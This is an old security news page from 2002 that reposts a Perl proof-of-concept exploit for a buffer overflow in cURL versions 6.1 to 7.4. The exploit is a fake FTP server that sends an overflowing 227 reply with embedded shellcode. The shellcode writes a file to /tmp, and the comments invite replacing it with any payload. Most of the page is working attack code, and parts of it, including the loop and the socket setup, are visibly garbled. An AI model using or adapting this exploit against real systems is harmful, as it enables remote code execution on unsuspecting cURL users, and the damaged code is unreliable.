Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Remote linux cURL exploit for versions 6.1 - 7.4

Remote linux cURL exploit for versions 6.1 - 7.4

by Nikola Strahija on May 6th, 2002 Here is some PoC code for the recent cURL overflows. (Linux version) exploits will also be posted at http://www.snosoft.com/research/


#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
#
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,
# may only be used for testing purposes. Additionally, the author does not
# take any resposibilities for abuse of this file. More information about
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer
# manipilation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org

use IO::Socket;
use Net::hostent;

$shellcode = # does a open() write() close() and exit().
"xebx40x5ex31xc0x88x46x0exc6x46x21x09xfex46x21".
"x88x46x22x8dx5ex0fx89x5ex23xb0x05x8dx1ex66xb9".
"x42x04x66xbaxe4x01xcdx80x89xc3xb0x04x8bx4ex23".
"x66xbax0fx27x66x81xeaxfcx26xcdx80xb0x06xcdx80".
"xb0x01x31xdbxcdx80xe8xbbxffxffxffx2fx74x6dx70".
"x2fx30x77x6ex65x64x2ex74x78x74x23x30x77x6ex65".
"x64x20x62x79x20x61x20x63x55x52x4cx20x3bx29";

while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}


$id = `id -u`; chop($id);
$size = 249;
$esp = 0xbffff810;
$offset = -150 unless $offset;
$port = 21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print
Option: $0 -o

Note: low ports require root privileges

TWENTE
exit;

}

for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!n" unless $sock;

while($cl = $sock->accept()) {

$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]n", $hostinfo->name || $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.n";
print $cl "230 Okn";
print $cl "227 $buffern";
sleep 2;

}


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »